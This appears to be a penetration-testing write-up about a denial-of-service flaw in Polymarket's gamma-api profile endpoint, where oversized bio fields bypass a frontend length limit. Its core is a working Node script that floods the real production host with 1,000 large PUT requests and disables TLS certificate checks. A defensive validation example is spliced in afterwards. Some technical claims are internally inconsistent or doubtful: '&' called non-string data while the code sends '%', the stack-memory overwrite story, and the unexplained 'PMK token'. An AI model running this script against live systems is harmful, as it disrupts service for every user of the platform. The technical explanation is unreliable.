Pentesting Polymarket
Impact
Complete crash of gamma-api.polymarket.com — Polymarket's prediction market API — causing full service disruption for all platform participants.
Vector
Frontend 200-char limit bypassed via direct API call → oversized bio payload (90,999 chars, non-string data) → stack memory overwrite in webserver process → API crash
Fix
Server-side input validation enforced on the bio field; payload size and type sanitized at the API layer; stack memory corruption path eliminated.
About Polymarket
Polymarket is a decentralized information market platform that allows users to trade on the outcomes of real-world events using blockchain technology. Participants can create markets around various topics, such as elections or sports results, and trade shares based on their predictions. The price of shares reflects the perceived probability of a particular outcome, and after the event occurs, the market settles with payouts for those who predicted correctly. Polymarket operates using the PMK token for governance and staking, ensuring a transparent, decentralized trading experience.

Polymarket, a prominent prediction market platform, recently faced a critical vulnerability in its profile sanitization mechanism. This flaw allowed attackers to inject a substantial amount of extraneous "junk" data into the database and API interface, leading to crashes and service disruptions. This case study covers the technical details of the vulnerability, how it was exploited, and the resulting impact on the platform.
Vulnerability Overview
The vulnerability resides in the profile sanitization mechanism of Polymarket's API, specifically in the user profile creation and bio editing functionality. By exploiting this flaw, an attacker can submit excessive data payloads that overwhelm the database and the API interface (gamma-api.polymarket.com), leading to a complete crash of the platform.
Affected Endpoints:
https://gamma-api.polymarket.com/profiles/${ID} (HTTP method: PUT)
https://gamma-api.polymarket.com/
Exploitation Details
The flaw was identified in the process of creating or editing a user's bio. While the frontend HTML/JavaScript interface imposes a 200-character limit on the bio field, the API lacks proper validation for input size and type. This oversight allows attackers to bypass the frontend restrictions and submit malicious payloads directly to the API.

Through the API directly

Initial exploit testing:
A large payload consisting of non-string data (e.g., runs of & characters) was submitted to the bio field. This payload bypassed the server's validation checks and was processed successfully, returning a 204 No Content response after a significant delay. By repeatedly sending crafted HTTP requests with the large payload to the https://gamma-api.polymarket.com/profiles/${ID} endpoint, an attacker can cause the webserver process to overwrite parts of its stack memory. This corruption alters the request handling flow and crashes the API interface.
const axios = require('axios');

// Oversized bio payload: 90,999 '%' characters, far beyond the frontend's 200-char limit
const jsonData = { bio: '%'.repeat(90999) };

async function sendRequest() {
    try {
        const response = await axios.put('https://gamma-api.polymarket.com/profiles/ID', jsonData, {
            httpsAgent: new (require('https').Agent)({ rejectUnauthorized: false })
        });
        console.log(response.data);
    } catch (error) {
        console.error('Error:', error.message);
    }
}

// Send 1000 requests, one every 100 ms
const numRequests = 1000;
const interval = 100;
let requestCount = 0;

const intervalId = setInterval(() => {
    if (requestCount < numRequests) {
        sendRequest();
        requestCount++;
    } else {
        clearInterval(intervalId);
        console.log('All requests sent.');
    }
}, interval);
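The server-side check described under Fix, written as an added example rather than Polymarket's own code: the bio field name and the 200-character limit come from the write-up, while MAX_BODY_BYTES and the function names are assumptions for illustration.

```javascript
// Added example, not Polymarket's code: server-side validation for PUT /profiles/:id.
// `bio` and the 200-char limit come from the write-up; MAX_BODY_BYTES is assumed.
const BIO_MAX_CHARS = 200;        // same limit the frontend enforces
const MAX_BODY_BYTES = 4 * 1024;  // assumed cap for a profile-update request body

// Reject oversized bodies before any parsing: first by the declared
// Content-Length, then by the bytes actually received.
function checkBodySize(contentLength, rawBody) {
  const declared = Number(contentLength);
  if (Number.isFinite(declared) && declared > MAX_BODY_BYTES) {
    return { ok: false, status: 413, error: 'payload too large' };
  }
  if (Buffer.byteLength(rawBody, 'utf8') > MAX_BODY_BYTES) {
    return { ok: false, status: 413, error: 'payload too large' };
  }
  return { ok: true };
}

// Validate the parsed JSON: the body must be an object, `bio` must be a string,
// and its length (counted in code points, not UTF-16 units) must not exceed the
// limit. Non-printable control characters are rejected as well.
function validateBio(body) {
  if (body === null || typeof body !== 'object' || Array.isArray(body)) {
    return { ok: false, status: 400, error: 'body must be a JSON object' };
  }
  const { bio } = body;
  if (typeof bio !== 'string') {
    return { ok: false, status: 400, error: 'bio must be a string' };
  }
  if ([...bio].length > BIO_MAX_CHARS) {
    return { ok: false, status: 400, error: `bio exceeds ${BIO_MAX_CHARS} characters` };
  }
  if (/[\u0000-\u0008\u000B\u000C\u000E-\u001F\u007F]/.test(bio)) {
    return { ok: false, status: 400, error: 'bio contains control characters' };
  }
  return { ok: true, bio: bio.trim() };
}

// Full handling of a profile-update body: size gate, JSON parse, field checks.
function handleProfileUpdate(contentLength, rawBody) {
  const size = checkBodySize(contentLength, rawBody);
  if (!size.ok) return size;
  let parsed;
  try {
    parsed = JSON.parse(rawBody);
  } catch (e) {
    return { ok: false, status: 400, error: 'malformed JSON' };
  }
  return validateBio(parsed);
}
```

The size gate runs before JSON.parse so the 90,999-character payload from the write-up is refused with 413 without ever being buffered into the application's data structures.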
Conclusion
This case study highlights the importance of robust input validation and memory management in API design. The Polymarket vulnerability serves as a reminder that even seemingly minor oversights can lead to significant security incidents. By addressing these issues, organizations can safeguard their systems against similar exploits.